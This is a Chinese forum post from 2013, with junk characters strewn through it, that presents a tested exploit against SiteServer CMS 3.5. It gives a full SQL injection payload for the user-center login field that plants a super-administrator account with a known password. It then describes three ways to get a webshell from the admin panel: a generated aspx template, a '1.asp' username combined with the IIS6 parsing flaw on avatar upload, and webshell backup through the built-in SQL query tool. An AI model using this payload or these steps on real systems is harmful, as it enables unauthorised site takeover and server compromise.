经测试秒杀最新的3.5版
( G& Z; m( e$ @* astieserver官网:www.siteserver.cn U7 [- M) |, o, Y+ W3 ]
EXP:
9 O$ V# c' v/ d4 x+ Z) j, U$ `直接访问UserCenter/login.aspx
, Q, @9 `# K. y! i用户名处输入:
& w9 I" w i+ f& b) ^: `; ?2 m6 U- {, ^1 m* S7 Y" s0 s
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–2 q7 B. \+ v' q
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。2 q( L ^% q0 T: m
之后再访问后台SiteServer/login.aspx用插入的用户登陆
) C/ D3 ^) b) r$ G后台拿webshell的三种方法:2 \* C- K: b. O* T
一、
$ g& A9 \( g. @: r站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
) Z% z7 S7 V; D二、
8 x) M+ c5 `) T6 \成员权限-》添加用户-》用户名为:1.asp. A" u- f" [4 V2 R
http://127.0.0.1/usercenter/2 `% S; [5 L3 ^8 U: n/ f
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell! N) V2 b# Z( c5 @+ r
(ps:后台添加用户时不会验证是否含有非法字符)! j* g! r' ]; Y7 d
三、
) w5 F1 L. y3 W0 r系统工具-》实用工具-》机器参数查看( q: \( k5 k6 E' m) Q
可以看到数据库类型、名称,WEB路径+ K+ `7 `8 Z! i8 k7 T6 L
系统工具-》数据库工具-》SQL语句查询( w/ A5 A" g2 S1 y, i9 ~
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对